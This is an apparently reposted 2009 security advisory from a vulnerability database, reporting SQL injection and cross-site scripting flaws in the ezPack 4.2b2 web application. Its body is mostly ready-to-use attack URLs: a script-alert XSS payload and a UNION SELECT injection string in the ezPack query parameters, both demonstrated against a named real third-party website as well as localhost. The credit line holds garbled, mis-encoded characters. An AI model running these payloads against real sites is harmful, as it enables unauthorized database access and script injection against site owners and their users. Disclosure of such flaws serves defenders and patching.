ezPack 4.2b2 (XSS/SQL) Multiple Remote Vulnerabilities

2009.01.10
Credit: !-BUGJACK-!
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89
CWE-79

+++++++++++ EZpack (XSS/SQL) Vulnerability ++++++++++ ************************************************************************ ProDuct Name : EZpack Download : http://www2.se-ed.net/fatcoder/?mode=download Author : !-BUGJACK-! Site : www.it-dark.com +***************************************************************+ [SQL] http://localhost/ezPack/op=prog&mdfd=webboard&act=1&ID=1&qType=ID+[SQL] *****************************************************************+ [XSS] http://localhost/ezPack/?op=prog&mdfd=[XSS] *****************************************************************+ Demo XSS http://www.khokhaoislandbeach.com/ezPack/?op=prog&mdfd=<script%20type="text/javascript">%20alert('xss')%20</script> Demo SQl http://www.khokhaoislandbeach.com/ezPack/?op=prog&mdfd=webboard&act=1&ID=1&qType=0'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/* ************************************************************************************************************************************************************************************************************ Anuwat555 Dol2&#224;&#185;&#65533;E&#224;&#185;&#65533;MoN K33&#224;&#191;!N IT-DarK Team. All

References:

http://www.securityfocus.com/bid/33131
http://www.milw0rm.com/exploits/7680


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top